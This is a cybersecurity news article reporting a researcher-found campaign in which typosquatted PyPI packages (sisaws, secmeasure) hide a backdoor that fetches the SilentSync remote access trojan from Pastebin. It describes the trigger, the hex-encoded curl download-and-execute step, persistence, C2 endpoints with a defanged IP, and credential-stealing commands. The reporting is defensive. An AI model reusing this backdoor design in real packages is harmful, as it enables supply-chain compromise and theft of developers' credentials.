Fake PyPI Uploads Used to Deploy SilentSync Remote Access Tool

Zscaler ThreatLabz has uncovered a coordinated campaign in which malicious actors leveraged typosquatted Python packages on the Python Package Index (PyPI) to deploy a fully featured Remote Access Trojan (RAT) dubbed SilentSync.

In July 2025, the package termncolor was identified as a supply-chain risk, and on August 4, 2025, ThreatLabz spotted two additional malicious uploads, sisaws and secmeasure, both authored by billordowiyi@gmail.com.

These packages were crafted to mimic legitimate libraries while embedding a stealthy backdoor that retrieves and executes the SilentSync payload from Pastebin.

Supply Chain Risk via Typosquatting

The sisaws package was designed to impersonate the legitimate sisa library, which integrates with Argentina’s Sistema Integrado de Información Sanitaria Argentino (SISA) APIs.

Outwardly, sisaws implements modules puco and renaper, offering validation of eight-digit DNI numbers, XML parsing of health coverage data, and JSON-style dictionary responses.

However, its init.py contains a gen_token function requiring a hard-coded UUID value (f5d3a8c2-4c01-47e2-a1a4-4dcb9a3d7e65).

Correct use of this token prompts sisaws to return a forged API-like response and issue a secondary token, after which it sends a GET request to http://200.58.107[.]25:2104/datalist?dni=&password=perro.

The remote response trimmed of its first four characters is fed into Python’s ast.literal_eval(), enabling dynamic evaluation of threat actor-controlled data structures.

A hex-encoded string within gen_token decodes to a curl command that downloads helper.py from Pastebin, writing it to % TEMP%helper.py and executing it.

Similarly, secmeasure markets itself as a string-sanitization library, offering functions for whitespace stripping, special-character removal, HTML escaping, Unicode normalization, and command sanitization.

Despite these legitimate APIs, its sanitize_input function leverages the same hex-encoded curl bootstrap to fetch SilentSync.

Metadata across both packages, including the uploader’s email, release cadence, and naming conventions, demonstrates a rapid development cycle with four uploads in two days (secmeasure versions 0.1.0–0.1.2 and sisaws 2.1.6).

SilentSync Capabilities and C2 Protocol

Once executed, SilentSync achieves persistence on Windows by creating a Run key under HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun named PyHelper.

While the RAT includes built-in routines for Linux (via crontab @reboot) and macOS (via LaunchAgents), the initial distribution through sisaws and secmeasure only targets Windows.

The payload communicates with its command-and-control (C2) server at 200.58.107[.]25 over HTTP, polling endpoints such as /checkin for beaconing, /comando for task retrieval, /respuesta for status reporting, and /archivo for data exfiltration.

Supported commands include cmd (shell execution), get (file or directory exfiltration with optional ZIP compression), screenshot (desktop capture), upload (file upload notification), and browserdata (theft of Chrome, Edge, Brave, and Firefox credentials, history, autofill data, and cookies).

This campaign highlights the evolving supply-chain threat landscape within public code repositories. By exploiting typosquatting, threat actors can deliver potent RAT capabilities under the guise of trusted packages.

Organizations and developers must enforce stringent package vetting, monitor for anomalous dependency behavior, and leverage multilayered security controls to detect and block backdoor downloads such as SilentSync.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Fake PyPI Uploads Used to Deploy SilentSync Remote Access Tool appeared first on Cyber Security News.